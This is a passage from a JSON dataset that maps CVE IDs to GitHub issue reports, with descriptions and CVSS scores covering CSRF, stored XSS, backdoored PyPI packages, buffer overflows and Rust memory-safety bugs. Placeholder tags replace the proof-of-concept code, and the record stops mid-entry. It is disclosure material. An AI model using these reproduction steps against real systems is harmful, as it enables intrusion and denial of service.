  84599. "description": "There are two CSRF vulnerabilities that can lead to deleting local .dat files. Software Link : URLTAG After the installation is complete, log in as administrator, open the page In FILETAG and FILETAG , user can delete any local .dat files without filter FILETAG FILETAG Create NUMBERTAG dat in the parent directory FILETAG To delete NUMBERTAG dat, the url is like URLTAG Or URLTAG Also you can delete any .dat file like local google chrome file FILETAG URLTAG Here is CSRF POC FILETAG : Log in and click the link in APITAG modify the parameter of delete and users will delete the .dat file in the specified directory at last. APITAG",
  84600. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H",
  84601. "severity": "HIGH",
  84602. "baseScore": 8.1,
  84603. "impactScore": 5.2,
  84604. "exploitabilityScore": 2.8
  84605. },
  84606. {
  84607. "CVE_ID": "CVE-2022-33122",
  84608. "Issue_Url_old": "https://github.com/eyoucms/eyoucms/issues/24",
  84609. "Issue_Url_new": "https://github.com/weng-xianhu/eyoucms/issues/24",
  84610. "Repo_new": "weng-xianhu/eyoucms",
  84611. "Issue_Created_At": "2022-06-12T02:49:11Z",
  84612. "description": "There is stored XSS in version NUMBERTAG which can lead to stealing sensitive information of logged in users. Software Link : URLTAG Website : FILETAG Vulnerable version NUMBERTAG download address \uff1a FILETAG After the installation is complete, log in as admin, open the page FILETAG Here you can fill in malicious APITAG code to cause stored xss FILETAG Malicious code is spliced \u200b\u200binto the href link FILETAG Causes stored XSS to steal sensitive information of logged in users FILETAG POC : APITAG",
  84613. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  84614. "severity": "MEDIUM",
  84615. "baseScore": 4.8,
  84616. "impactScore": 2.7,
  84617. "exploitabilityScore": 1.7
  84618. },
  84619. {
  84620. "CVE_ID": "CVE-2022-33124",
  84621. "Issue_Url_old": "https://github.com/aio-libs/aiohttp/issues/6772",
  84622. "Issue_Url_new": "https://github.com/aio-libs/aiohttp/issues/6772",
  84623. "Repo_new": "aio-libs/aiohttp",
  84624. "Issue_Created_At": "2022-05-31T11:50:45Z",
  84625. "description": "Invalid IP NUMBERTAG URL. Describe the bug URL analysis To Reproduce use oss fuzz this is the crash APITAG APITAG Expected behavior Denial of service Logs/tracebacks ERRORTAG Python Version APITAG aiohttp Version APITAG multidict Version APITAG yarl Version APITAG OS ubuntu Related component Server Additional context _No response_ Code of Conduct [X] I agree to follow the aio libs Code of Conduct",
  84626. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  84627. "severity": "MEDIUM",
  84628. "baseScore": 5.5,
  84629. "impactScore": 3.6,
  84630. "exploitabilityScore": 1.8
  84631. },
  84632. {
  84633. "CVE_ID": "CVE-2022-34000",
  84634. "Issue_Url_old": "https://github.com/libjxl/libjxl/issues/1477",
  84635. "Issue_Url_new": "https://github.com/libjxl/libjxl/issues/1477",
  84636. "Repo_new": "libjxl/libjxl",
  84637. "Issue_Created_At": "2022-06-06T08:27:22Z",
  84638. "description": "Assert failure in APITAG desc There is an assert failure in libjxl before version NUMBERTAG that could cause a denial of service attack. asan output ERRORTAG poc FILETAG reproduce compile libjxl with address sanitizer run APITAG",
  84639. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  84640. "severity": "MEDIUM",
  84641. "baseScore": 6.5,
  84642. "impactScore": 3.6,
  84643. "exploitabilityScore": 2.8
  84644. },
  84645. {
  84646. "CVE_ID": "CVE-2022-34053",
  84647. "Issue_Url_old": "https://github.com/ylliprifti/dr-web-engine/issues/4",
  84648. "Issue_Url_new": "https://github.com/ylliprifti/dr-web-engine/issues/4",
  84649. "Repo_new": "ylliprifti/dr-web-engine",
  84650. "Issue_Created_At": "2022-06-13T14:09:38Z",
  84651. "description": "code execution backdoor. We found a malicious backdoor in versions NUMBERTAG APITAG of this project, and its malicious backdoor is the request package. Even if the request package was removed by pypi, many mirror sites did not completely delete this package, so it could still be APITAG using pip install dr web APITAG i URLTAG trusted host APITAG the request malicious plugin can be successfully installed. FILETAG Repair suggestion: delete version NUMBERTAG APITAG in APITAG",
  84652. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  84653. "severity": "CRITICAL",
  84654. "baseScore": 9.8,
  84655. "impactScore": 5.9,
  84656. "exploitabilityScore": 3.9
  84657. },
  84658. {
  84659. "CVE_ID": "CVE-2022-34054",
  84660. "Issue_Url_old": "https://github.com/ludovicmoncla/perdido/issues/1",
  84661. "Issue_Url_new": "https://github.com/ludovicmoncla/perdido/issues/1",
  84662. "Repo_new": "ludovicmoncla/perdido",
  84663. "Issue_Created_At": "2022-06-14T03:20:00Z",
  84664. "description": "code execution backdoor. We found a malicious backdoor in versions NUMBERTAG of this project, and its malicious backdoor is the request package. Even if the request package was removed by pypi, many mirror sites did not completely delete this package, so it could still be APITAG using pip install perdido NUMBERTAG i URLTAG trusted host APITAG the request malicious plugin can be successfully installed. FILETAG Repair suggestion: delete version NUMBERTAG in APITAG",
  84665. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  84666. "severity": "CRITICAL",
  84667. "baseScore": 9.8,
  84668. "impactScore": 5.9,
  84669. "exploitabilityScore": 3.9
  84670. },
  84671. {
  84672. "CVE_ID": "CVE-2022-34055",
  84673. "Issue_Url_old": "https://github.com/drewxa/summer-tasks/issues/4",
  84674. "Issue_Url_new": "https://github.com/drewxa/summer-tasks/issues/4",
  84675. "Repo_new": "drewxa/summer-tasks",
  84676. "Issue_Created_At": "2022-06-14T03:45:36Z",
  84677. "description": "code execution backdoor. We found a malicious backdoor in versions NUMBERTAG of this project, and its malicious backdoor is the request package. Even if the request package was removed by pypi, many mirror sites did not completely delete this package, so it could still be APITAG using pip install drxhello NUMBERTAG i URLTAG trusted host APITAG the request malicious plugin can be successfully installed. FILETAG Repair suggestion: delete version NUMBERTAG in APITAG Your project url: URLTAG",
  84678. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  84679. "severity": "CRITICAL",
  84680. "baseScore": 9.8,
  84681. "impactScore": 5.9,
  84682. "exploitabilityScore": 3.9
  84683. },
  84684. {
  84685. "CVE_ID": "CVE-2022-34056",
  84686. "Issue_Url_old": "https://github.com/TimHessels/watertools/issues/1",
  84687. "Issue_Url_new": "https://github.com/timhessels/watertools/issues/1",
  84688. "Repo_new": "timhessels/watertools",
  84689. "Issue_Created_At": "2022-06-14T10:23:53Z",
  84690. "description": "code execution backdoor. We found a malicious backdoor in versions NUMBERTAG of this project, and its malicious backdoor is the request package. Even if the request package was removed by pypi, many mirror sites did not completely delete this package, so it could still be APITAG using pip install watertools NUMBERTAG i URLTAG trusted host APITAG the request malicious plugin can be successfully installed. FILETAG Repair suggestion: delete version NUMBERTAG in APITAG",
  84691. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  84692. "severity": "CRITICAL",
  84693. "baseScore": 9.8,
  84694. "impactScore": 5.9,
  84695. "exploitabilityScore": 3.9
  84696. },
  84697. {
  84698. "CVE_ID": "CVE-2022-34059",
  84699. "Issue_Url_old": "https://github.com/sixfab/setup-and-diagnostic-tool/issues/7",
  84700. "Issue_Url_new": "https://github.com/sixfab/setup-and-diagnostic-tool/issues/7",
  84701. "Repo_new": "sixfab/setup-and-diagnostic-tool",
  84702. "Issue_Created_At": "2022-06-14T14:03:52Z",
  84703. "description": "code execution backdoor. We found a malicious backdoor in versions NUMBERTAG of this project, and its malicious backdoor is the request package. Even if the request package was removed by pypi, many mirror sites did not completely delete this package, so it could still be APITAG using pip install sixfab tool i URLTAG trusted host APITAG the request malicious plugin can be successfully installed. FILETAG Repair suggestion: delete version NUMBERTAG in APITAG replace request with requests",
  84704. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  84705. "severity": "CRITICAL",
  84706. "baseScore": 9.8,
  84707. "impactScore": 5.9,
  84708. "exploitabilityScore": 3.9
  84709. },
  84710. {
  84711. "CVE_ID": "CVE-2022-34060",
  84712. "Issue_Url_old": "https://github.com/togglee/togglee-python/issues/2",
  84713. "Issue_Url_new": "https://github.com/togglee/togglee-python/issues/2",
  84714. "Repo_new": "togglee/togglee-python",
  84715. "Issue_Created_At": "2022-06-14T14:24:03Z",
  84716. "description": "code execution backdoor. We found a malicious backdoor in versions NUMBERTAG of this project, and its malicious backdoor is the request package. Even if the request package was removed by pypi, many mirror sites did not completely delete this package, so it could still be APITAG using pip install togglee NUMBERTAG i URLTAG trusted host APITAG the request malicious plugin can be successfully installed. FILETAG Repair suggestion: delete version NUMBERTAG in APITAG",
  84717. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  84718. "severity": "CRITICAL",
  84719. "baseScore": 9.8,
  84720. "impactScore": 5.9,
  84721. "exploitabilityScore": 3.9
  84722. },
  84723. {
  84724. "CVE_ID": "CVE-2022-34061",
  84725. "Issue_Url_old": "https://github.com/CatNeverCodes/catly_translate/issues/1",
  84726. "Issue_Url_new": "https://github.com/tunglies/catly_translate/issues/1",
  84727. "Repo_new": "tunglies/catly_translate",
  84728. "Issue_Created_At": "2022-06-15T03:16:03Z",
  84729. "description": "code execution backdoor. We found a malicious backdoor in versions NUMBERTAG of this project, and its malicious backdoor is the request package. Even if the request package was removed by pypi, many mirror sites did not completely delete this package, so it could still be APITAG using pip install catly translate NUMBERTAG i URLTAG trusted host APITAG the request malicious plugin can be successfully installed. FILETAG Repair suggestion: delete version NUMBERTAG in APITAG",
  84730. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  84731. "severity": "CRITICAL",
  84732. "baseScore": 9.8,
  84733. "impactScore": 5.9,
  84734. "exploitabilityScore": 3.9
  84735. },
  84736. {
  84737. "CVE_ID": "CVE-2022-34065",
  84738. "Issue_Url_old": "https://github.com/rondolu/project-yt-concate/issues/1",
  84739. "Issue_Url_new": "https://github.com/rondolu/project-yt-concate/issues/1",
  84740. "Repo_new": "rondolu/project-yt-concate",
  84741. "Issue_Created_At": "2022-06-16T14:49:33Z",
  84742. "description": "code execution backdoor. We found a malicious backdoor in versions NUMBERTAG of this project, and its malicious backdoor is the request package. Even if the request package was removed by pypi, many mirror sites did not completely delete this package, so it could still be APITAG using pip install rondolu yt concate i URLTAG trusted host APITAG the request malicious plugin can be successfully installed. FILETAG Repair suggestion: delete version NUMBERTAG in APITAG replace request with requests",
  84743. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  84744. "severity": "CRITICAL",
  84745. "baseScore": 9.8,
  84746. "impactScore": 5.9,
  84747. "exploitabilityScore": 3.9
  84748. },
  84749. {
  84750. "CVE_ID": "CVE-2022-34066",
  84751. "Issue_Url_old": "https://github.com/rasmushaugaard/texercise-cli/issues/1",
  84752. "Issue_Url_new": "https://github.com/rasmushaugaard/texercise-cli/issues/1",
  84753. "Repo_new": "rasmushaugaard/texercise-cli",
  84754. "Issue_Created_At": "2022-06-18T00:44:51Z",
  84755. "description": "code execution backdoor. We found a malicious backdoor in versions NUMBERTAG APITAG of this project, and its malicious backdoor is the request package. Even if the request package was removed by pypi, many mirror sites did not completely delete this package, so it could still be APITAG using pip install texercise i URLTAG trusted host APITAG the request malicious plugin can be successfully installed. FILETAG Repair suggestion: delete version NUMBERTAG APITAG in APITAG replace request with requests",
  84756. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  84757. "severity": "CRITICAL",
  84758. "baseScore": 9.8,
  84759. "impactScore": 5.9,
  84760. "exploitabilityScore": 3.9
  84761. },
  84762. {
  84763. "CVE_ID": "CVE-2022-34092",
  84764. "Issue_Url_old": "https://github.com/saladesituacao/i3geo/issues/3",
  84765. "Issue_Url_new": "https://github.com/saladesituacao/i3geo/issues/3",
  84766. "Repo_new": "saladesituacao/i3geo",
  84767. "Issue_Created_At": "2022-06-13T19:58:56Z",
  84768. "description": "Vulnerabilidade XSS APITAG Site Scripting) or HTML Injection FILETAG . Boa tarde A vulnerabilidade em quest\u00e3o est\u00e1 no arquivo FILETAG . O n\u00edvel de severidade da vulnerabilidade \u00e9 alta, pois \u00e9 poss\u00edvel a inje\u00e7\u00e3o de c\u00f3digo html, bem como a execu\u00e7\u00e3o de c\u00f3digo javascript. Proof of Concept (POC) O falha pode ser testada da seguinte maneira: URLTAG Desde j\u00e1 agrade\u00e7o a aten\u00e7\u00e3o. Wagner Drachinski FILETAG",
  84769. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  84770. "severity": "MEDIUM",
  84771. "baseScore": 6.1,
  84772. "impactScore": 2.7,
  84773. "exploitabilityScore": 2.8
  84774. },
  84775. {
  84776. "CVE_ID": "CVE-2022-34092",
  84777. "Issue_Url_old": "https://github.com/edmarmoretti/i3geo/issues/3",
  84778. "Issue_Url_new": "https://github.com/edmarmoretti/i3geo/issues/3",
  84779. "Repo_new": "edmarmoretti/i3geo",
  84780. "Issue_Created_At": "2022-06-14T10:56:46Z",
  84781. "description": "Vulnerabilidade XSS APITAG Site Scripting) or HTML Injection FILETAG . Boa tarde A vulnerabilidade em quest\u00e3o est\u00e1 no arquivo FILETAG . O n\u00edvel de severidade da vulnerabilidade \u00e9 alta, pois \u00e9 poss\u00edvel a inje\u00e7\u00e3o de c\u00f3digo html, bem como a execu\u00e7\u00e3o de c\u00f3digo javascript. Proof of Concept (POC) O falha pode ser testada da seguinte maneira: URLTAG Desde j\u00e1 agrade\u00e7o a aten\u00e7\u00e3o. Wagner Drachinski FILETAG",
  84782. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  84783. "severity": "MEDIUM",
  84784. "baseScore": 6.1,
  84785. "impactScore": 2.7,
  84786. "exploitabilityScore": 2.8
  84787. },
  84788. {
  84789. "CVE_ID": "CVE-2022-34094",
  84790. "Issue_Url_old": "https://github.com/edmarmoretti/i3geo/issues/5",
  84791. "Issue_Url_new": "https://github.com/edmarmoretti/i3geo/issues/5",
  84792. "Repo_new": "edmarmoretti/i3geo",
  84793. "Issue_Created_At": "2022-06-14T10:57:53Z",
  84794. "description": "Vulnerabilidade XSS APITAG Site Scripting) or HTML Injection FILETAG . Boa tarde A vulnerabilidade em quest\u00e3o est\u00e1 no arquivo FILETAG . O n\u00edvel de severidade da vulnerabilidade \u00e9 alta, pois \u00e9 poss\u00edvel a inje\u00e7\u00e3o de c\u00f3digo html, bem como a execu\u00e7\u00e3o de c\u00f3digo javascript. Proof of Concept (POC) O falha pode ser testada da seguinte maneira: URLTAG Desde j\u00e1 agrade\u00e7o a aten\u00e7\u00e3o. Wagner Drachinski FILETAG",
  84795. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  84796. "severity": "MEDIUM",
  84797. "baseScore": 6.1,
  84798. "impactScore": 2.7,
  84799. "exploitabilityScore": 2.8
  84800. },
  84801. {
  84802. "CVE_ID": "CVE-2022-34132",
  84803. "Issue_Url_old": "https://github.com/bbalet/jorani/issues/369",
  84804. "Issue_Url_new": "https://github.com/bbalet/jorani/issues/369",
  84805. "Repo_new": "bbalet/jorani",
  84806. "Issue_Created_At": "2022-06-05T19:17:08Z",
  84807. "description": "Several vulnerabilities. Hello, Several vulnerabilities were found when peeking into Jorani webapp. An email containing details about those issues was sent. Best regards,",
  84808. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  84809. "severity": "CRITICAL",
  84810. "baseScore": 9.8,
  84811. "impactScore": 5.9,
  84812. "exploitabilityScore": 3.9
  84813. },
  84814. {
  84815. "CVE_ID": "CVE-2022-34299",
  84816. "Issue_Url_old": "https://github.com/davea42/libdwarf-code/issues/119",
  84817. "Issue_Url_new": "https://github.com/davea42/libdwarf-code/issues/119",
  84818. "Repo_new": "davea42/libdwarf-code",
  84819. "Issue_Created_At": "2022-06-15T12:36:15Z",
  84820. "description": "heap overflow in dwarf_global_formref_b. asan output: ERRORTAG poc: FILETAG repro: APITAG",
  84821. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H",
  84822. "severity": "HIGH",
  84823. "baseScore": 8.1,
  84824. "impactScore": 5.2,
  84825. "exploitabilityScore": 2.8
  84826. },
  84827. {
  84828. "CVE_ID": "CVE-2022-34300",
  84829. "Issue_Url_old": "https://github.com/syoyo/tinyexr/issues/167",
  84830. "Issue_Url_new": "https://github.com/syoyo/tinyexr/issues/167",
  84831. "Repo_new": "syoyo/tinyexr",
  84832. "Issue_Created_At": "2022-06-14T16:06:34Z",
  84833. "description": "heap overflow in APITAG desc There is a heap based buffer overflow in APITAG before NUMBERTAG that could cause remote code execution depending on the usage of this program. asan output ERRORTAG poc FILETAG reproduce compile this project using address sanitizer run APITAG",
  84834. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  84835. "severity": "HIGH",
  84836. "baseScore": 8.8,
  84837. "impactScore": 5.9,
  84838. "exploitabilityScore": 2.8
  84839. },
  84840. {
  84841. "CVE_ID": "CVE-2022-34913",
  84842. "Issue_Url_old": "https://github.com/nereusx/md2roff/issues/4",
  84843. "Issue_Url_new": "https://github.com/nereusx/md2roff/issues/4",
  84844. "Repo_new": "nereusx/md2roff",
  84845. "Issue_Created_At": "2022-06-29T15:07:29Z",
  84846. "description": "Stack Based Buffer Overflow When Processing Markdown Files . Hi! I'm a big fan of md2roff. It's been quite useful and has come in handy in so many situations! Stack Based Buffer Overflow I wanted to make you aware of a stack based buffer overflow vulnerability in the md2roff tool. A buffer overflow condition exists when a program attempts to put more data in a buffer than it can hold or when a program attempts to put data in a memory area past a buffer. At a minimum this will lead to a denial of service (if md2roff is run as a server/service) but can also lead to arbitrary code execution URLTAG and privilege escalation as a result of the return pointer (on the stack) being overwritten. Reproduction To reproduce the vulnerability, execute the following commands in Linux once you have compiled the program (using the default Makefile). Create a markdown file with a large number of integers: FILETAG Verify the markdown file contains our large buffer of NUMBERTAG s: FILETAG Execute md2roff using any preferred flags and confirm the segfault: FILETAG Using GDB we can see that we successfully redirected the execution of the program. We can see our NUMBERTAG s on the stack and the program attempting to return to NUMBERTAG which is NUMBERTAG repeated in hex). FILETAG FILETAG Remediation Replace all instances of strcpy with strncpy and ensure the content being read into the buffer is the same size or smaller than the available buffer space: URLTAG URLTAG URLTAG URLTAG Useful References URLTAG CVETAG FILETAG > Check the warning in the description URLTAG > Safer way to copy a buffer",
  84847. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  84848. "severity": "CRITICAL",
  84849. "baseScore": 9.8,
  84850. "impactScore": 5.9,
  84851. "exploitabilityScore": 3.9
  84852. },
  84853. {
  84854. "CVE_ID": "CVE-2022-35411",
  84855. "Issue_Url_old": "https://github.com/abersheeran/rpc.py/issues/22",
  84856. "Issue_Url_new": "https://github.com/abersheeran/rpc.py/issues/22",
  84857. "Repo_new": "abersheeran/rpc.py",
  84858. "Issue_Created_At": "2022-07-05T19:41:44Z",
  84859. "description": "Unauthenticated Remote Code Execution vulnerability. Unfortunately, I have not received any replies from the maintainer within a time frame of two weeks, so I am disclosing this vulnerability that is still existent in the latest version, with no patch available: URLTAG",
  84860. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  84861. "severity": "CRITICAL",
  84862. "baseScore": 9.8,
  84863. "impactScore": 5.9,
  84864. "exploitabilityScore": 3.9
  84865. },
  84866. {
  84867. "CVE_ID": "CVE-2020-36436",
  84868. "Issue_Url_old": "https://github.com/udoprog/unicycle/issues/8",
  84869. "Issue_Url_new": "https://github.com/udoprog/unicycle/issues/8",
  84870. "Repo_new": "udoprog/unicycle",
  84871. "Issue_Created_At": "2020-11-15T06:02:43Z",
  84872. "description": "APITAG and Unordered<T, S> need bounds on their APITAG traits. Hi there, we APITAG group APITAG gatech) are scanning crates on crates.io for potential soundness bugs. We noticed that the APITAG : URLTAG and ERRORTAG URLTAG types implement the Send and Sync traits for all types. This should likely be bounded by Send / Sync on the contained types otherwise it can lead to data races from safe Rust code. Here's an example of such a data race with APITAG : ERRORTAG which outputs: APITAG",
  84873. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  84874. "severity": "HIGH",
  84875. "baseScore": 8.1,
  84876. "impactScore": 5.9,
  84877. "exploitabilityScore": 2.2
  84878. },
  84879. {
  84880. "CVE_ID": "CVE-2021-28032",
  84881. "Issue_Url_old": "https://github.com/bennetthardwick/nano-arena/issues/1",
  84882. "Issue_Url_new": "https://github.com/bennetthardwick/nano-arena/issues/1",
  84883. "Repo_new": "bennetthardwick/nano-arena",
  84884. "Issue_Created_At": "2021-03-01T17:52:00Z",
  84885. "description": "split_at can create unsound aliasing violations if APITAG returns different indexes. Hi there, we APITAG group APITAG gatech) are scanning crates on crates.io for potential soundness bugs. We noticed that in the APITAG functions: URLTAG APITAG is called twice, the first time to select the value from the arena and then the second time to create the split. Since the Borrow trait is not required to return the same thing twice, this can be used to create two mutable references to the same object: ERRORTAG This outputs: APITAG",
  84886. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  84887. "severity": "CRITICAL",
  84888. "baseScore": 9.8,
  84889. "impactScore": 5.9,
  84890. "exploitabilityScore": 3.9
  84891. },
  84892. {
  84893. "CVE_ID": "CVE-2020-36439",
  84894. "Issue_Url_old": "https://github.com/kvark/ticketed_lock/issues/7",
  84895. "Issue_Url_new": "https://github.com/kvark/ticketed_lock/issues/7",
  84896. "Repo_new": "kvark/ticketed_lock",
  84897. "Issue_Created_At": "2020-11-17T05:26:28Z",
  84898. "description": "APITAG and APITAG should only be sendable when T is Send. Hi there, we APITAG group APITAG gatech) are scanning crates on crates.io for potential soundness bugs. We noticed that APITAG URLTAG and APITAG URLTAG implement Send for all types T . However, this should probably be bounded by APITAG , otherwise it allows smuggling non Send types across thread boundaries. Here's an example of a data race with Rc s that segfaults safe Rust code: ERRORTAG This outputs: APITAG",
  84899. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  84900. "severity": "HIGH",
  84901. "baseScore": 8.1,
  84902. "impactScore": 5.9,
  84903. "exploitabilityScore": 2.2
  84904. },
  84905. {
  84906. "CVE_ID": "CVE-2021-29937",
  84907. "Issue_Url_old": "https://github.com/Yoric/telemetry.rs/issues/45",
  84908. "Issue_Url_new": "https://github.com/yoric/telemetry.rs/issues/45",
  84909. "Repo_new": "yoric/telemetry.rs",
  84910. "Issue_Created_At": "2021-02-17T20:45:50Z",
  84911. "description": "uninitialized memory can be dropped on panic: APITAG Hello, we APITAG group APITAG gatech) found a memory safety/soundness issue in this crate while scanning Rust code on crates.io for potential vulnerabilities. Issue Description URLTAG User provided APITAG can potentially panic, and if APITAG panics while vec is only partially initialized, uninitialized memory (uninitialized T ) is dropped and can lead to undefined behavior. Thank you for checking out this issue :)",
  84912. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  84913. "severity": "CRITICAL",
  84914. "baseScore": 9.8,
  84915. "impactScore": 5.9,
  84916. "exploitabilityScore": 3.9
  84917. },
  84918. {
  84919. "CVE_ID": "CVE-2021-25900",
  84920. "Issue_Url_old": "https://github.com/servo/rust-smallvec/issues/252",
  84921. "Issue_Url_new": "https://github.com/servo/rust-smallvec/issues/252",
  84922. "Repo_new": "servo/rust-smallvec",
  84923. "Issue_Created_At": "2021-01-08T05:18:24Z",
  84924. "description": "Buffer overflow in APITAG . Hello fellow Rustacean, we APITAG group APITAG gatech) found a memory safety/soundness issue in this crate while scanning Rust code on crates.io for potential vulnerabilities. Issue Description URLTAG APITAG overflows the buffer when an iterator yields more items than the lower bound of APITAG . The problem is in line NUMBERTAG APITAG reserves capacity for n more elements to be inserted. This is done by comparing the length and the capacity. Since the length of the buffer is set to NUMBERTAG in line NUMBERTAG line NUMBERTAG will be always no op and the following code will overflow the buffer. Reproduction Below is an example program that exhibits undefined behavior using safe APIs of smallvec . ERRORTAG Output: APITAG Tested Environment Crate: smallvec Version NUMBERTAG OS: Ubuntu NUMBERTAG LTS Rustc version: rustc NUMBERTAG eac NUMBERTAG abb NUMBERTAG",
  84925. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  84926. "severity": "CRITICAL",
  84927. "baseScore": 9.8,
  84928. "impactScore": 5.9,
  84929. "exploitabilityScore": 3.9
  84930. },
  84931. {
  84932. "CVE_ID": "CVE-2021-29942",
  84933. "Issue_Url_old": "https://github.com/tiby312/reorder/issues/1",
  84934. "Issue_Url_new": "https://github.com/tiby312/reorder/issues/1",
  84935. "Repo_new": "tiby312/reorder",
  84936. "Issue_Created_At": "2021-02-24T19:40:04Z",
  84937. "description": "swap_index can return uninitialized memory. Hi there, we APITAG group APITAG gatech) are scanning crates on crates.io for potential soundness bugs. We noticed that in APITAG , the length returned by the iterator is used to set the length of the vector: URLTAG However, as noted in the documentation for APITAG : > This function has the same safety guarantees as the Iterator::size_hint function. and then APITAG 's documentation URLTAG says: > APITAG is primarily intended to be used for optimizations such as reserving space for the elements of the iterator, but must not be trusted to e.g., omit bounds checks in unsafe code. An incorrect implementation of APITAG should not lead to memory safety violations. Here's an example of some code that will use uninitialized memory through this method: ERRORTAG",
  84938. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
  84939. "severity": "HIGH",
  84940. "baseScore": 7.3,
  84941. "impactScore": 3.4,
  84942. "exploitabilityScore": 3.9
  84943. },
  84944. {
  84945. "CVE_ID": "CVE-2020-35879",
  84946. "Issue_Url_old": "https://github.com/AtheMathmo/rulinalg/issues/201",
  84947. "Issue_Url_new": "https://github.com/athemathmo/rulinalg/issues/201",
  84948. "Repo_new": "athemathmo/rulinalg",
  84949. "Issue_Created_At": "2020-02-11T17:08:55Z",
  84950. "description": "API soundness issue in APITAG and APITAG . The current definition of APITAG and APITAG creates APITAG bounded reference from APITAG . Since the returned slice is created from a stored pointer in APITAG , it should be bounded by APITAG lifetime instead of APITAG . With the current definitions of those methods, it is possible to cause data race with safe Rust code. CODETAG",
  84951. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  84952. "severity": "CRITICAL",
  84953. "baseScore": 9.8,
  84954. "impactScore": 5.9,
  84955. "exploitabilityScore": 3.9
  84956. },
  84957. {
  84958. "CVE_ID": "CVE-2022-1434",
  84959. "Issue_Url_old": "https://github.com/github/advisory-database/issues/405",
  84960. "Issue_Url_new": "https://github.com/github/advisory-database/issues/405",
  84961. "Repo_new": "github/advisory-database",
  84962. "Issue_Created_At": "2022-06-17T11:32:26Z",
  84963. "description": "APITAG re: openssl src NUMBERTAG and NUMBERTAG release streams. Hiya lovelies dependabot is atm pestering :crab: to switch from NUMBERTAG openssl release stream to NUMBERTAG which is incorrect advice I suspect this might be an issue where dependabot is not reading the unaffected attribute? ERRORTAG The above should not have asked NUMBERTAG users to switch to NUMBERTAG a separate issue related to unaffected field perhaps? However.. But fact is that NUMBERTAG release stream was affected as well so we upgraded our patched to below: We also resolved this separate issue with this advisory as it should have flagged vulnerable NUMBERTAG ersions too So we upgraded our advisory to: APITAG In Rust :crab: we have two release streams for openssl src NUMBERTAG and NUMBERTAG APITAG NUMBERTAG users should upgrade to NUMBERTAG o APITAG NUMBERTAG users should upgrade to NUMBERTAG In crates NUMBERTAG are under NUMBERTAG and NUMBERTAG are under NUMBERTAG o is brought by APITAG which resolves this advisory We updated RUSTSEC NUMBERTAG to reflect the reality for openssl src : URLTAG This should mean that anyone either below APITAG (in NUMBERTAG release stream) or below NUMBERTAG in NUMBERTAG stream) should upgrade to either of release stream patched versions. Original issue in APITAG URLTAG",
  84964. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N",
  84965. "severity": "MEDIUM",
  84966. "baseScore": 5.9,
  84967. "impactScore": 3.6,
  84968. "exploitabilityScore": 2.2
  84969. },
  84970. {
  84971. "CVE_ID": "CVE-2021-29936",
  84972. "Issue_Url_old": "https://github.com/charles-r-earp/adtensor/issues/4",
  84973. "Issue_Url_new": "https://github.com/charles-r-earp/adtensor/issues/4",
  84974. "Repo_new": "charles-r-earp/adtensor",
  84975. "Issue_Created_At": "2021-01-12T04:21:14Z",
  84976. "description": "NUMBERTAG panic safety issue in APITAG for Vector / Matrix . Hello :crab: , we APITAG group APITAG gatech) found a memory safety/soundness issue in this crate while scanning Rust code on crates.io for potential vulnerabilities. Issue Description In the code that matches the latest release on crates.io APITAG trait implementation of APITAG on APITAG & APITAG can lead to a segmentation fault in safe Rust code. In both cases, code will panic if the input iterator i has shorter length than N . Upon panic, the program will drop partially uninitialized memory ( v ), which can lead to undefined behavior. From APITAG ERRORTAG From APITAG ERRORTAG Proof of Concept The below example exhibits a segmentation fault by only using safe Rust code with APITAG . A similar example can also be crafted with APITAG . CODETAG Program output ERRORTAG Suggested Fix It seems that the current github repo is totally different from the code that corresponds to the latest release APITAG on crates.io. We suggest to yank the affected versions on crates.io. Thank you for checking out this issue NUMBERTAG",
